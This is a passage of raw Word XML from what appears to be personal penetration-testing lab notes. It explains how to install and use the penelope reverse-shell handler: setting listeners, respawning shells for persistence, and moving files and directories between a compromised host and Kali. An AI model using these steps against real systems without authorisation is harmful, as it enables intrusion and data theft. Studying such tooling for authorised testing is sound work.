        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It allows you to open up another rev shell connection quickly! Really great if attack vector is long, and you are afraid your gonna accidentally close terminal, so just create a new rev shell connection on another tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run winPEAS and linPEAS in background without uploading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I think it's like evil-winrm and allows for "upload" and "download" stuff locally, so no need to CURL and stuff everytime!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For every shell that may be killed for some reason, automatically a new one is spawned. This gives us a kind of persistence with the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Added the ability to bypass SSL verification for Internet downloads. So, you can try downloading exploits from web directly without having to first download on Kali first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add penelope to path so that you can just run "penelope" to open it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir -p ~/.local/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv ~/penelope.py ~/.local/bin/penelope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x ~/.local/bin/penelope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'export PATH="$PATH:$HOME/.local/bin"' &gt;&gt; ~/.zshrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">source ~/.zshrc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is assuming you are running zsh instead of bash. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="858"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can check what you are running by running</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo $SHELL </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to open penelope:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">penelope </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listens on port 4444 by default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to listen on a specific port:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1346"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">penelope -p 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to open another session of reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This gets you to the menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listeners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows all the listeners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listeners stop &lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stop the listener of the port that you used for current rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because we are going to reuse that port on the new listener. This is because sometimes only certain ports work for reverse shell, so it's safest to reuse the same port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then on a new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">penelope -p &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then on the original tab:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">spawn &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="698500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="362" name="image350.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image350.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138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3AF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is normal to see the error message in red! Check your new tab. It should have spawn in the new shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download files from rev shell to local kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will tell you which file it downloaded it to in the output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download directories from rev shell to local kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download &lt;directoryName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upload files from working directory to rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
